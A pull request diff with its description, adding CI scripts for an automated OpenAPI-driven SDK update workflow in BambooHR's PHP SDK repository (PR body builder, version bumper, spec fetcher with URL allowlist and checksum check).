+        if line.startswith("Reason:"):
+            reason = line[len("Reason:"):].strip()
+            break
+    return (level, reason)
+
+
+def build(args: argparse.Namespace) -> str:
+    sections: list[str] = []
+
+    # --- Banner keyed off the three-tier generation status -----------------
+    if args.generation_status == "generation-failed":
+        sections.append(
+            "> [!CAUTION]\n"
+            "> **`make generate` failed on this run.**\n"
+            "> The committed tree contains the spec update but no regenerated\n"
+            "> SDK — the package is not buildable as-is. Reproduce locally\n"
+            "> with `make generate` and resolve the underlying error before\n"
+            "> merging."
+        )
+    elif args.generation_status == "quality-issues":
+        sections.append(
+            "> [!WARNING]\n"
+            "> **Generation succeeded, but one or more quality checks failed.**\n"
+            "> The regenerated SDK is structurally valid; one or more of\n"
+            "> `make format` / `make lint` / `make smoke-test` / `make test`\n"
+            "> reported issues. See the workflow run for per-step details and\n"
+            "> reproduce locally with the failing target before merging."
+        )
+
+    # --- Spec source metadata ----------------------------------------------
+    metadata_text = read_optional(args.spec_metadata)
+    if metadata_text:
+        try:
+            metadata = json.loads(metadata_text)
+        except json.JSONDecodeError:
+            metadata = {}
+        source_commit = metadata.get("source_commit", "unknown")
+        generated_at = metadata.get("generated_at", "unknown")
+        spec_url = metadata.get("url", "")
+        commit_link = (
+            f"[`{source_commit[:12]}`]({args.source_repo_url}/commit/{source_commit})"
+            if source_commit and source_commit != "unknown"
+            else "`unknown`"
+        )
+        meta_block = [
+            "## Spec source",
+            "",
+            f"- **Source commit:** {commit_link}",
+            f"- **Generated at:** `{generated_at}`",
+        ]
+        if spec_url:
+            meta_block.append(f"- **Spec URL:** {spec_url}")
+        sections.append("\n".join(meta_block))
+
+    # --- Semver classification ---------------------------------------------
+    classification_text = read_optional(args.classification)
+    level, reason = parse_classification(classification_text)
+    if level:
+        sections.append(
+            "\n".join(
+                [
+                    "## Semver classification",
+                    "",
+                    f"**Bump level:** `{level}`",
+                    "",
+                    f"**Reason:** {reason or '_(no reason supplied)_'}",
+                ]
+            )
+        )
+
+    # --- Version bump section ----------------------------------------------
+    if args.old_version and args.new_version and args.old_version != args.new_version:
+        sections.append(
+            "\n".join(
+                [
+                    "## Version bump",
+                    "",
+                    f"`{args.old_version}` → `{args.new_version}`",
+                ]
+            )
+        )
+
+    # --- oasdiff markdown changelog ----------------------------------------
+    changelog_md = read_optional(args.changelog_md).strip()
+    if changelog_md:
+        sections.append(
+            "<details>\n"
+            "<summary><strong>API changelog</strong> (from oasdiff)</summary>\n\n"
+            f"{changelog_md}\n"
+            "</details>"
+        )
+
+    # --- Changes since last review -----------------------------------------
+    delta = read_optional(args.since_last_review).strip()
+    if delta:
+        sections.append(
+            "<details>\n"
+            "<summary><strong>Changes since last review</strong></summary>\n\n"
+            "```diff\n"
+            f"{delta}\n"
+            "```\n"
+            "</details>"
+        )
+    else:
+        sections.append(
+            "## Changes since last review\n\n_Initial PR — no prior review baseline._"
+        )
+
+    # --- Footer -------------------------------------------------------------
+    sections.append(
+        "---\n"
+        "_This PR was opened automatically by the `sdk-update` workflow._\n"
+        "_Trigger: `workflow_dispatch`._"
+    )
+
+    return "\n\n".join(sections) + "\n"
+
+
+def parse_args() -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--classification", default="")
+    parser.add_argument("--changelog-md", default="")
+    parser.add_argument("--spec-metadata", default="")
+    parser.add_argument("--source-repo-url", default="https://github.com/BambooHR/main")
+    parser.add_argument("--since-last-review", default="")
+    parser.add_argument(
+        "--generation-status",
+        choices=["success", "quality-issues", "generation-failed"],
+        default="success",
+    )
+    parser.add_argument("--old-version", default="")
+    parser.add_argument("--new-version", default="")
+    return parser.parse_args()
+
+
+def main() -> int:
+    sys.stdout.write(build(parse_args()))
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/scripts/bump_version.py
+++ b/scripts/bump_version.py
@@ -40,10 +40,18 @@ from pathlib import Path
 
 VALID_LEVELS = {"major", "minor", "patch", "none"}
 SEMVER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")
-# Match `PACKAGE_VERSION = X.Y.Z` allowing surrounding whitespace; preserve
-# everything else on the line (comments, trailing whitespace).
+# Match `PACKAGE_VERSION = X.Y.Z` allowing surrounding horizontal whitespace
+# (spaces/tabs only); preserve everything else on the same line (trailing
+# whitespace, inline comments).
+#
+# All three character classes use [ \t] rather than \s on purpose. \s
+# matches \n too, and combined with re.MULTILINE + greedy .* it would
+# silently let group 5's suffix span into the next line of the Makefile.
+# That's harmless today (the suffix is faithfully spliced back in
+# write_makefile_version), but it's a footgun for any future maintainer
+# who reasons about match.end() expecting it to land at end-of-line.
 MAKEFILE_VERSION_RE = re.compile(
-    r"^(PACKAGE_VERSION\s*=\s*)(\d+)\.(\d+)\.(\d+)(\s*.*)$",
+    r"^(PACKAGE_VERSION[ \t]*=[ \t]*)(\d+)\.(\d+)\.(\d+)([ \t]*.*)$",
     re.MULTILINE,
 )
 

--- a/scripts/bump_version.py
+++ b/scripts/bump_version.py
@@ -1,0 +1,184 @@
+#!/usr/bin/env python3
+"""
+Bump the project version in composer.json and the Makefile's PACKAGE_VERSION
+per a semver classification.
+
+Per SPN-2933 (mirror of SPN-2931 for PHP), only `minor` and `patch` levels
+actually mutate files. `major` is skipped (a human takes that decision), and
+`none` is a no-op.
+
+Both files are kept in sync deliberately. The Makefile's PACKAGE_VERSION
+value is passed to openapi-generator as artifactVersion and re-stamped into
+the regenerated composer.json on every `make generate`, so if we only bumped
+one and not the other, the next regen would silently undo the bump.
+
+Usage:
+    bump_version.py LEVEL [--composer PATH] [--makefile PATH] [--dry-run]
+
+LEVEL must be one of: major, minor, patch, none.
+
+Outputs (written to $GITHUB_OUTPUT if set, also printed to stdout):
+    bumped=true|false       — whether the version values were rewritten
+    old_version=X.Y.Z       — version before this script ran
+    new_version=X.Y.Z       — version after this script ran (== old when bumped=false)
+
+Exit codes:
+    0  Success.
+    1  Bad arguments, files missing, or version values out of sync between
+       composer.json and Makefile (refuse to bump in that case — would
+       paper over a deeper drift).
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import os
+import re
+import sys
+from pathlib import Path
+
+VALID_LEVELS = {"major", "minor", "patch", "none"}
+SEMVER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")
+# Match `PACKAGE_VERSION = X.Y.Z` allowing surrounding whitespace; preserve
+# everything else on the line (comments, trailing whitespace).
+MAKEFILE_VERSION_RE = re.compile(
+    r"^(PACKAGE_VERSION\s*=\s*)(\d+)\.(\d+)\.(\d+)(\s*.*)$",
+    re.MULTILINE,
+)
+
+
+def emit_output(key: str, value: str) -> None:
+    line = f"{key}={value}"
+    print(line)
+    output_path = os.environ.get("GITHUB_OUTPUT")
+    if output_path:
+        with open(output_path, "a", encoding="utf-8") as handle:
+            handle.write(line + "\n")
+
+
+def parse_args() -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("level", choices=sorted(VALID_LEVELS))
+    parser.add_argument("--composer", default="composer.json")
+    parser.add_argument("--makefile", default="Makefile")
+    parser.add_argument("--dry-run", action="store_true")
+    return parser.parse_args()
+
+
+def read_composer_version(path: Path) -> str:
+    if not path.exists():
+        raise SystemExit(f"bump_version: composer.json not found: {path}")
+    try:
+        data = json.loads(path.read_text(encoding="utf-8"))
+    except json.JSONDecodeError as exc:
+        raise SystemExit(f"bump_version: composer.json is not valid JSON: {exc}")
+    version = data.get("version")
+    if not isinstance(version, str) or not SEMVER_RE.match(version):
+        raise SystemExit(
+            f"bump_version: composer.json `version` missing or not semver: {version!r}"
+        )
+    return version
+
+
+def read_makefile_version(path: Path) -> tuple[str, re.Match[str], str]:
+    if not path.exists():
+        raise SystemExit(f"bump_version: Makefile not found: {path}")
+    content = path.read_text(encoding="utf-8")
+    match = MAKEFILE_VERSION_RE.search(content)
+    if not match:
+        raise SystemExit(
+            f"bump_version: no `PACKAGE_VERSION = X.Y.Z` line found in {path}"
+        )
+    version = f"{match.group(2)}.{match.group(3)}.{match.group(4)}"
+    return version, match, content
+
+
+def write_composer_version(path: Path, new_version: str, dry_run: bool) -> None:
+    if dry_run:
+        return
+    raw = path.read_text(encoding="utf-8")
+    # Surgical replace on the `"version":` line so we don't reformat the
+    # rest of composer.json (json.dump would normalize indentation and key
+    # order, producing a noisy diff).
+    new_raw, count = re.subn(
+        r'("version"\s*:\s*")\d+\.\d+\.\d+(")',
+        rf"\g<1>{new_version}\g<2>",
+        raw,
+        count=1,
+    )
+    if count != 1:
+        raise SystemExit(
+            "bump_version: failed to find `\"version\": \"X.Y.Z\"` "
+            f"in {path} (file may use unusual formatting)"
+        )
+    path.write_text(new_raw, encoding="utf-8")
+
+
+def write_makefile_version(
+    path: Path, content: str, match: re.Match[str], new_version: str, dry_run: bool
+) -> None:
+    if dry_run:
+        return
+    prefix = match.group(1)
+    suffix = match.group(5)
+    new_content = (
+        content[: match.start()]
+        + f"{prefix}{new_version}{suffix}"
+        + content[match.end():]
+    )
+    path.write_text(new_content, encoding="utf-8")
+
+
+def bump(version: str, level: str) -> str:
+    major, minor, patch = (int(p) for p in version.split("."))
+    if level == "minor":
+        return f"{major}.{minor + 1}.0"
+    if level == "patch":
+        return f"{major}.{minor}.{patch + 1}"
+    # major / none — caller handles skip semantics
+    return version
+
+
+def main() -> int:
+    args = parse_args()
+
+    composer_path = Path(args.composer)
+    makefile_path = Path(args.makefile)
+
+    composer_version = read_composer_version(composer_path)
+    makefile_version, makefile_match, makefile_content = read_makefile_version(
+        makefile_path
+    )
+
+    if composer_version != makefile_version:
+        print(
+            f"bump_version: refusing to bump — composer.json ({composer_version}) "
+            f"and Makefile PACKAGE_VERSION ({makefile_version}) are out of sync. "
+            "Reconcile manually before re-running.",
+            file=sys.stderr,
+        )
+        return 1
+
+    old_version = composer_version
+    new_version = bump(old_version, args.level)
+
+    if new_version == old_version:
+        emit_output("bumped", "false")
+        emit_output("old_version", old_version)
+        emit_output("new_version", old_version)
+        return 0
+
+    write_composer_version(composer_path, new_version, args.dry_run)
+    write_makefile_version(
+        makefile_path, makefile_content, makefile_match, new_version, args.dry_run
+    )
+
+    emit_output("bumped", "true")
+    emit_output("old_version", old_version)
+    emit_output("new_version", new_version)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/scripts/fetch_spec.py
+++ b/scripts/fetch_spec.py
@@ -1,0 +1,164 @@
+#!/usr/bin/env python3
+"""
+Fetch the public OpenAPI spec, its SHA256 sidecar, and metadata sidecar.
+
+Verifies the downloaded spec checksum matches the sidecar. Compares the
+downloaded spec against the committed `specs/public.yaml` and signals via
+the `changed` output whether the workflow needs to continue.
+
+Inputs (CLI flags, all optional — sensible CloudFront defaults):
+    --spec-url       URL or file:// path for public-openapi.yaml
+    --sha256-url     URL or file:// path for the .sha256 sidecar
+    --metadata-url   URL or file:// path for spec-metadata.json
+    --staging-dir    Where to write the staged spec (default: .sdk-update/)
+    --committed-spec Path to the committed spec to diff against
+                     (default: specs/public.yaml)
+
+URLs are restricted to the CloudFront docs host or file:// paths.
+
+Outputs (written to $GITHUB_OUTPUT if set, also printed to stdout):
+    changed=true|false       — true if the new spec differs from committed
+    source_commit=<sha>      — from spec-metadata.json
+    generated_at=<timestamp> — from spec-metadata.json
+    checksum_sha256=<hash>   — from the .sha256 sidecar
+    staged_spec_path=<path>  — absolute path of the staged spec on disk
+    resolved_spec_url=<url>  — the spec URL actually used (override or default)
+
+Exit codes:
+    0  Success (regardless of `changed` value).
+    1  Bad input (URL not allowlisted, missing file, etc.).
+    2  Checksum mismatch — spec content does not match the .sha256 sidecar.
+    3  Network or HTTP failure.
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import json
+import os
+import re
+import sys
+import urllib.error
+import urllib.request
+from pathlib import Path
+from typing import Final
+
+CLOUDFRONT_HOST: Final = "https://d40bgjb2zs35x.cloudfront.net"
+DEFAULT_SPEC_URL: Final = f"{CLOUDFRONT_HOST}/main/latest/docs/openapi/public-openapi.yaml"
+DEFAULT_SHA256_URL: Final = f"{DEFAULT_SPEC_URL}.sha256"
+DEFAULT_METADATA_URL: Final = (
+    f"{CLOUDFRONT_HOST}/main/latest/docs/openapi/spec-metadata.json"
+)
+
+# Allow either the CloudFront docs host or a local file:// path. Anything else
+# is rejected so a manual workflow_dispatch override can't be pointed at an
+# arbitrary domain.
+ALLOWED_URL_RE: Final = re.compile(
+    rf"^(?:{re.escape(CLOUDFRONT_HOST)}/.+|file://.+)$"
+)
+
+
+def fail(code: int, message: str) -> None:
+    print(f"fetch_spec: {message}", file=sys.stderr)
+    sys.exit(code)
+
+
+def validate_url(url: str, label: str) -> None:
+    if not ALLOWED_URL_RE.match(url):
+        fail(
+            1,
+            f"{label} not on the allowlist (CloudFront docs host or file://): {url}",
+        )
+
+
+def download(url: str, label: str) -> bytes:
+    validate_url(url, label)
+    try:
+        with urllib.request.urlopen(url) as response:  # noqa: S310 — allowlisted above
+            return response.read()
+    except urllib.error.HTTPError as http_error:
+        fail(3, f"HTTP {http_error.code} fetching {label} from {url}")
+    except urllib.error.URLError as url_error:
+        fail(3, f"network error fetching {label} from {url}: {url_error.reason}")
+    raise AssertionError("unreachable")  # for type-checkers
+
+
+def parse_sha256_sidecar(content: bytes) -> str:
+    """Sidecar may be plain `<hash>` or coreutils-style `<hash>  filename`."""
+    text = content.decode("ascii", errors="strict").strip()
+    return text.split()[0].lower()
+
+
+def emit_output(key: str, value: str) -> None:
+    line = f"{key}={value}"
+    print(line)
+    output_path = os.environ.get("GITHUB_OUTPUT")
+    if output_path:
+        with open(output_path, "a", encoding="utf-8") as handle:
+            handle.write(line + "\n")
+
+
+def parse_args() -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--spec-url", default=DEFAULT_SPEC_URL)
+    parser.add_argument("--sha256-url", default=DEFAULT_SHA256_URL)
+    parser.add_argument("--metadata-url", default=DEFAULT_METADATA_URL)
+    parser.add_argument("--staging-dir", default=".sdk-update")
+    parser.add_argument("--committed-spec", default="specs/public.yaml")
+    return parser.parse_args()
+
+
+def main() -> int:
+    args = parse_args()
+
+    spec_bytes = download(args.spec_url, "spec")
+    sha256_bytes = download(args.sha256_url, "sha256 sidecar")
+    metadata_bytes = download(args.metadata_url, "metadata sidecar")
+
+    expected_hash = parse_sha256_sidecar(sha256_bytes)
+    actual_hash = hashlib.sha256(spec_bytes).hexdigest()
+    if actual_hash != expected_hash:
+        fail(
+            2,
+            f"checksum mismatch: sidecar says {expected_hash}, "
+            f"downloaded spec hashes to {actual_hash}",
+        )
+
+    try:
+        metadata = json.loads(metadata_bytes)
+    except json.JSONDecodeError as decode_error:
+        fail(1, f"metadata sidecar is not valid JSON: {decode_error}")
+
+    source_commit = metadata.get("source_commit", "")
+    generated_at = metadata.get("generated_at", "")
+
+    staging = Path(args.staging_dir)
+    staging.mkdir(parents=True, exist_ok=True)
+    staged_spec = staging / "public.yaml"
+    staged_spec.write_bytes(spec_bytes)
+
+    # Diff against the committed spec. Bytewise comparison — same content
+    # always produces the same SHA256, so this is also redundant with the
+    # checksum we already verified, but it's the cheapest way to detect
+    # "nothing changed" without re-running the generator.
+    committed = Path(args.committed_spec)
+    changed = (
+        not committed.exists() or committed.read_bytes() != spec_bytes
+    )
+
+    emit_output("changed", "true" if changed else "false")
+    emit_output("source_commit", source_commit)
+    emit_output("generated_at", generated_at)
+    emit_output("checksum_sha256", expected_hash)
+    emit_output("staged_spec_path", str(staged_spec.resolve()))
+    emit_output("resolved_spec_url", args.spec_url)
+
+    if not changed:
+        print("fetch_spec: spec unchanged from committed copy; downstream steps should skip.")
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())


### PR DESCRIPTION
## Summary

PHP counterpart of [SPN-2931](https://github.com/BambooHR/bhr-api-python/pulls?q=SPN-2931)'s sdk-update orchestration. Same shape as the Python implementation; **every lesson from the Python iteration is baked in from the start** so the PHP version skips the bug-fix rounds we paid for there.

## Implements all of the AC from [SPN-2933](https://bamboohr.atlassian.net/browse/SPN-2933)

- ✅ Concurrency group \`sdk-generation\` with cancel-in-progress
- ✅ Spec fetch + SHA256 validation; short-circuits on unchanged
- ✅ oasdiff breaking + changelog (JSON & markdown)
- ✅ Semver classification via existing \`classify_semver.sh\`
- ✅ Replaces \`specs/public.yaml\` and updates \`specs/spec-source.json\`
- ✅ Runs the SPN-2932 generation pipeline (\`make generate\`)
- ✅ \`make format\` / \`make lint\` / \`make smoke-test\` / \`make test\`
- ✅ Skip-if-no-meaningful-changes via \`git status --porcelain\`
- ✅ Version bump in composer.json + Makefile (skipped on major or failure)
- ✅ Force-push to \`auto/sdk-update\`, opens or updates the PR
- ✅ PR body: classification reasoning, oasdiff markdown, "since last review" delta, spec source metadata, link to BambooHR/main commit
- ✅ Labels: \`auto-generated\` always; \`breaking\` if breaking; \`generation-failed\` or \`quality-issues\` toggled per outcome (mutually exclusive, reconciled on every update)
- ✅ Reviewer \`@BambooHR/platapi\`
- ✅ \`workflow_dispatch\` only; cron commented out for Phase 1

## Lessons baked in from Python

These were all bugs we fixed iteratively on the Python side. PHP gets them on day one:

| Lesson | How it shows up in this PR |
|---|---|
| `oasdiff` v1.17.0 SIGSEGV regression | Pinned to v1.16.0 with comment linking root cause |
| Cascading quality checks hide downstream signals | Format/lint/smoke/test all gate only on `generate.outcome == 'success'` |
| Single binary success/failure can't distinguish "broken" from "merely lint-y" | Three-tier status: `success` / `quality-issues` / `generation-failed` |
| `gh pr edit --add-label` fails if a label doesn't exist | "Ensure workflow labels exist" step uses `gh label create --force` |
| `.sdk-update/` scratch dir gets swept into commit by `git add -A` | Added to `.gitignore` |
| `${{ ... }}` splicing into inline `python -c` is fragile | All values pass through env vars instead |
| `gh label create` needs `issues: write` permission | Granted on the job |

## PHP-specific bits

- `webfactory/ssh-agent@v0.10.0` loads `GHM_375_PRIVATE_REPO_DEPLOY_KEY` for composer to fetch `bamboohr/phpcs` over SSH (same pattern as `generate.yml`).
- `bump_version.py` updates **both** `composer.json` AND the Makefile's `PACKAGE_VERSION`. The Makefile value is what openapi-generator stamps into the regenerated `composer.json` as `artifactVersion`, so keeping them in sync prevents the next regen from silently undoing our bump. Script refuses to bump if the two values are already out of sync (forces a manual reconcile rather than papering over drift).
- Base branch is `master` (not `main`).

## Test plan

- [ ] Merge, then trigger `sdk-update.yml` via workflow_dispatch with no inputs against the current production spec. Expect: short-circuits cleanly on "spec unchanged" if the committed spec is up to date, or opens a bot PR with the regenerated tree if not.
- [ ] If a bot PR opens, verify the label set matches the outcome and the PR body banner matches the tier.
- [ ] On a follow-up workflow run that produces no spec change, verify the existing PR (if any) gets its body/title refreshed and stale labels reconciled.

🤖 Generated with [Claude Code](https://claude.ai/claude-code)

[SPN-2931]: https://bamboohr.atlassian.net/browse/SPN-2931?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ
[SPN-2933]: https://bamboohr.atlassian.net/browse/SPN-2933?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> Introduces automated spec fetch, regeneration, version bumps, and force-push/PR creation with write permissions and a deploy key for Composer; mistakes could open incorrect bot PRs or bump versions, but scope is CI-only with guards (checksum, URL allowlist, major skip).
> 
> **Overview**
> Adds a **`workflow_dispatch`-only `sdk-update` GitHub Actions pipeline** that polls the CloudFront-published OpenAPI spec (with SHA256 + metadata sidecars), exits early when `specs/public.yaml` is unchanged, and otherwise runs **oasdiff** (pinned to **v1.16.0**), existing **`classify_semver.sh`**, spec/metadata updates, **`make generate`** plus format/lint/smoke/test with **continue-on-error** and a **three-tier** outcome (`success` / `quality-issues` / `generation-failed`).
> 
> New **stdlib Python + bash helpers** (`fetch_spec.py` with URL allowlisting, `analyze_spec.sh`, `build_pr_body.py`, `bump_version.py` syncing **`composer.json`** and **`Makefile` `PACKAGE_VERSION`**) support the workflow. When there are real git changes, it **force-pushes `auto/sdk-update`**, opens or updates a bot PR for **`master`** with composed body/labels and **`@BambooHR/platapi`**, skipping auto-bump on **major** or failed generation.
> 
> **Repo hygiene:** ignore **`.sdk-update/`** so scratch artifacts are not committed; **`.openapi-generator-ignore`** blocks **`.github/**`** from future generator overwrites.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit ab756d413cbf99a70f3d64c96e06e11666ae26f2. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->